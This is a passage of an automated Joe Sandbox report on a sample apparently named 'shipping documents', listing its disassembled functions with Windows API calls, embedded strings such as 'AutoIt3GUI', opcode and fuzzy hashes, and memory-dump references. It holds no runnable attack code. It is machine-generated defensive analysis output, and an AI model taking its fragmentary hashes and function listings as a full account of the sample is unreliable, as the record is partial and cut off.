Opcode ID: 1e947a57780b0cd30dbbfe043b375f130bba452f9bbe26a12783385be3df8f1e
Instruction ID: 67bb26b96d80af1f787a7a6d3444dd1b2d52bf11ee2cb9d8d75ceaeeec43cbe2
Opcode Fuzzy Hash: 1e947a57780b0cd30dbbfe043b375f130bba452f9bbe26a12783385be3df8f1e
Instruction Fuzzy Hash: 9201B9B17052067BD604B9259C52FAB739F9F237B4F148115FD049A343FA50EE1187E4

Function 006B4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 006B4D5C
__beginthreadex.LIBCMT ref: 006B4D7A
MessageBoxW.USER32(?,?,?,?), ref: 006B4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006B4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006B4DAC

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 35b9c9332e8eef78ce24c4376911e4bd93dcbcf785f4bd2738ceb49c411d1383
Instruction ID: 10b28d7f9c903ece0bc1f2819e6f78295ec9f24a7ab2986188626ed900959a40
Opcode Fuzzy Hash: 35b9c9332e8eef78ce24c4376911e4bd93dcbcf785f4bd2738ceb49c411d1383
Instruction Fuzzy Hash: 9F1108B2D05244BFC7019BACDC08AEA7FAEEF49320F148366F915D3391DA758D4087A1

Function 006A874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006A8766
GetLastError.KERNEL32(?,006A822A,?,?,?), ref: 006A8770
GetProcessHeap.KERNEL32(00000008,?,?,006A822A,?,?,?), ref: 006A877F
HeapAlloc.KERNEL32(00000000,?,006A822A,?,?,?), ref: 006A8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006A879D

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
Instruction ID: a4e33feeab44a4f4de9616231f3258ce2f9de13933742b8d09fbc6c8a3dde06b
Opcode Fuzzy Hash: 466ed1d0a9c170e278c21090a5061a2166a74d8bb62105d8e500d96e633a6d7b
Instruction Fuzzy Hash: ED011271A01204FFDB105FA5DC48DABBB6EFF8A755720057AF84AC3260DA31DD00CA60

Function 006B54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 006B5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006B555E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 47fdd6bd4c3e4cdb7daceedbd571713596a5ec22d4b65cc1ed5deb16a76b6e10
Instruction ID: 4e5ba4f322d532e262f662550793660b132374cbba52a915cc2f82b7318a0a9b
Opcode Fuzzy Hash: 47fdd6bd4c3e4cdb7daceedbd571713596a5ec22d4b65cc1ed5deb16a76b6e10
Instruction Fuzzy Hash: 40012176D01A19DBDF10EFE4EC486EDBB7AFB09712F040556E502B2240DB305594C7A1

Function 006A7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?,?,006A799D), ref: 006A766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?), ref: 006A768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?), ref: 006A7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?), ref: 006A76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,006A758C,80070057,?,?), ref: 006A76B4

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
Instruction ID: 3c9fa27e5ae253b84e0f1886f79d2e6a0aa533036f1fcb4b610550dd8082fec2
Opcode Fuzzy Hash: fc8a5561298822696cc3767619610981a0db1d5ce0dcf7fefb19f332233f533e
Instruction Fuzzy Hash: 800184B2A01614BBDB106F58DC44BAA7BFEEB45751F145029FD05D2211E731DE419BA0

Function 006A85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 006A8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 006A8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 006A8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 006A8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 006A863E

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
Instruction ID: 0aa5f174658a80a9ece5edb072903d07aa8545ead49fab2c495f61922e9583bc
Opcode Fuzzy Hash: 2fbd7342c8f1566b9790ef255cbf66001a55b1e40a61be4e4cef423c0f30f477
Instruction Fuzzy Hash: B5F06231602204AFEB101FA5DD9DEAB3BAEEF8A754B045426F946C7250CB719C41DE60

Function 006A8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006A8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006A8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006A8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006A869F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
Instruction ID: 1af62a146f325f8577f381dc2e833864ef7d22eeba8eab6f090cb8ab6603c1fa
Opcode Fuzzy Hash: a7f8800de8e8367ada7c81e9739aab26fc0a1530087013b27fded684606a8d23
Instruction Fuzzy Hash: EEF06271601314AFEB112FA5EC88EA77BBEEF8A754B141026F946C7250CB71DD41DE60

Function 006AC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 006AC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 006AC6D1
MessageBeep.USER32(00000000), ref: 006AC6E9
KillTimer.USER32(?,0000040A), ref: 006AC705
EndDialog.USER32(?,00000001), ref: 006AC71F

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: e31fc3db883daeeec87fad6164d818ea6ca111b4e924cbb418cae9157c7de71b
Instruction ID: c514396709b032b916a54d9dd3bad5ddff8855c59c2d20c9b860871dde3ae7fc
Opcode Fuzzy Hash: e31fc3db883daeeec87fad6164d818ea6ca111b4e924cbb418cae9157c7de71b
Instruction Fuzzy Hash: 4E016230901704ABEB21AB20ED4EF9677BAFF01715F0416AAF543A15E1DBE1ED558F80

Function 006513B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 006513BF
StrokeAndFillPath.GDI32(?,?,0068BAD8,00000000,?), ref: 006513DB
SelectObject.GDI32(?,00000000), ref: 006513EE
DeleteObject.GDI32 ref: 00651401
StrokePath.GDI32(?), ref: 0065141C

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: a6f3f415185e399e639ccc989620ed8c5386c8ed21244346a36a1527a459ad39
Instruction ID: e582a4c2cd772945c4748a24e59691f5eeab733c955d6db5442f6a2c0c6d6dc7
Opcode Fuzzy Hash: a6f3f415185e399e639ccc989620ed8c5386c8ed21244346a36a1527a459ad39
Instruction Fuzzy Hash: 81F0E730405308EBDB115F2EEC1C7983FA6AB02326F04D225E82A895F1C73989A9DF64

Function 00662E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00670FF6: std::exception::exception.LIBCMT ref: 0067102C
Part of subcall function 00670FF6: __CxxThrowException@8.LIBCMT ref: 00671041

Part of subcall function 00657F41: _memmove.LIBCMT ref: 00657F82

Part of subcall function 00657BB1: _memmove.LIBCMT ref: 00657C0B

__swprintf.LIBCMT ref: 0066302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00662EC6

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 0ef2710e5a75776c19b9b9f1d8309c0b35f2716cd874f5a6e08ea69c6e72c13e
Instruction ID: e1ad662b41089fa608295a3a6dc5de253b75658865b534ad2598b38d83f74442
Opcode Fuzzy Hash: 0ef2710e5a75776c19b9b9f1d8309c0b35f2716cd874f5a6e08ea69c6e72c13e
Instruction Fuzzy Hash: 75919F715083119FCB58EF24D895C6EB7AAEF85740F04491DF8869B3A1DB30EE48CB66

Function 006BBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 006548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006548A1,?,?,006537C0,?), ref: 006548CE

CoInitialize.OLE32(00000000), ref: 006BBC26
CoCreateInstance.OLE32(006E2D6C,00000000,00000001,006E2BDC,?), ref: 006BBC3F
CoUninitialize.OLE32 ref: 006BBC5C

Part of subcall function 00659997: __itow.LIBCMT ref: 006599C2
Part of subcall function 00659997: __swprintf.LIBCMT ref: 00659A0C

Strings

.lnk, xrefs: 006BBC08, 006BBC16

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 897aa5502501d9767de09132d0c384c20425306438465ce89eae684a00b86c39
Instruction ID: aab23f25f2f41591055940c37f1cdf0b736fb638959f5874f0277e900377259c
Opcode Fuzzy Hash: 897aa5502501d9767de09132d0c384c20425306438465ce89eae684a00b86c39
Instruction Fuzzy Hash: A1A113756043059FCB00DF14C884D9ABBE6FF89315F188998F89A9B3A1CB71ED49CB91

Function 006AB7B6 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 006AB981

Strings

Container, xrefs: 006AB8FE
AutoIt3GUI, xrefs: 006AB8F9
%n, xrefs: 006ABA24

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%n
API String ID: 3565006973-1483441161
Opcode ID: b532ff88a0dc4c06f9a63a21354710fba903a72a1b231a4f77f7dec030d03a46
Instruction ID: a85efe88569bd82293c34c0061e8887b8b782551963f6e1482f97135f20de3f2
Opcode Fuzzy Hash: b532ff88a0dc4c06f9a63a21354710fba903a72a1b231a4f77f7dec030d03a46
Instruction Fuzzy Hash: 6E913B706006019FDB54DF68C884A6AB7EAFF4A710F14956DE94ACB7A2DB70EC41CF60

Function 0067524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 006752DD

Part of subcall function 00680340: __87except.LIBCMT ref: 0068037B

Strings

pow, xrefs: 006752B5, 006752D2

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 0fdaa0de95a45edf08ff7f8e2053a8d1ea38f7ea6ede32b09c8b828b318e5a2f
Instruction ID: df0fdac46ec364cbe0bfb44822d5ed8497a2734feaf724341e912300e7ee3596
Opcode Fuzzy Hash: 0fdaa0de95a45edf08ff7f8e2053a8d1ea38f7ea6ede32b09c8b828b318e5a2f
Instruction Fuzzy Hash: F4514C61A0DA01C7E7917724C9413BA27D79B00750F20CF98E49E453E6EFB4CDD99B46

Function 0067023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

+, xrefs: 00670277
#, xrefs: 00670280

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 2430aade28b163f8b1638a64b67b007964195f68bcf57885398a9f665c6caa25
Instruction ID: 0fef4e35c9571c8f4db442c3e7ccf7d024aad370c846ff660f08ed9a5edf1652
Opcode Fuzzy Hash: 2430aade28b163f8b1638a64b67b007964195f68bcf57885398a9f665c6caa25
Instruction Fuzzy Hash: 60512175504246DFDF15FF28C888AFA7BA6EF1A320F188055EC969B3A0D7309D46CB64

Function 00663297 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006633D7
_memmove.LIBCMT ref: 00663470
_free.LIBCMT ref: 00663496
_memmove.LIBCMT ref: 00663549

Strings

Oaf, xrefs: 00663482

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memmove$_free
String ID: Oaf
API String ID: 2620147621-1555074404
Opcode ID: 6860c34f4c86e7c73e3947280602952b333140726ef590c2e5e20b96a33313d1
Instruction ID: 3f74dcf8f53cd0428506e855cacecd80e8679dd1f1eba0dd6346423813c31154
Opcode Fuzzy Hash: 6860c34f4c86e7c73e3947280602952b333140726ef590c2e5e20b96a33313d1
Instruction Fuzzy Hash: BA513A716183519FDB64CF28C451B6BBBE6BF85314F04892DE98AC7351DB31EA01CB92

Function 006662F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006663A8
_memmove.LIBCMT ref: 00666446
_memset.LIBCMT ref: 0066646A

Strings

ERCP, xrefs: 00666313

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 1770eb2a1b91366eba3573ae86a0f8f8617e6d2e8e5888d551850afefc5356b5
Instruction ID: a44d99e25089975bef12adfbd4d6c7b76c2310da01c9cc90f4e6ed7883490a67
Opcode Fuzzy Hash: 1770eb2a1b91366eba3573ae86a0f8f8617e6d2e8e5888d551850afefc5356b5
Instruction Fuzzy Hash: 9851A071900309DBDB24CF65D8817EABBF6EF04714F20856EE54ADB341EB71AA85CB50

Function 006D7648 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 006D76D0
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 006D76E4
SendMessageW.USER32(?,00001002,00000000,?), ref: 006D7708

Strings

SysMonthCal32, xrefs: 006D769B

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: ccf4f7689e7858d44c6b06e8f35934ccfc60e0dc1b28df95ecda7b583721c68a
Instruction ID: a896d8c074fa7917475452a31d119d8fabf87711cf2499e46556cc65d649ba5b
Opcode Fuzzy Hash: ccf4f7689e7858d44c6b06e8f35934ccfc60e0dc1b28df95ecda7b583721c68a
Instruction Fuzzy Hash: 2D21B532900219BBDF11CF54CC46FEA3B7AEF48714F111215FE156B2D0E6B5E8519BA0

Function 006D6F1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 006D6FAA
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006D6FBA
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006D6FDF

Strings

Listbox, xrefs: 006D6F77

Memory Dump Source

Source File: 00000000.00000002.2067786039.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true

Associated: 00000000.00000002.2067764560.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067895724.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067936093.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2067952140.0000000000718000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_650000_shipping documents.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a0167a50c2ee12c0e4e2514ea84112f720777f0ec8c46c56ddd02b8087bf606c
Instruction ID: b6adc5205642149e6b2741692c3d98d187848efe13e3aa7b3585783d222d26b9
Opcode Fuzzy Hash: a0167a50c2ee12c0e4e2514ea84112f720777f0ec8c46c56ddd02b8087bf606c
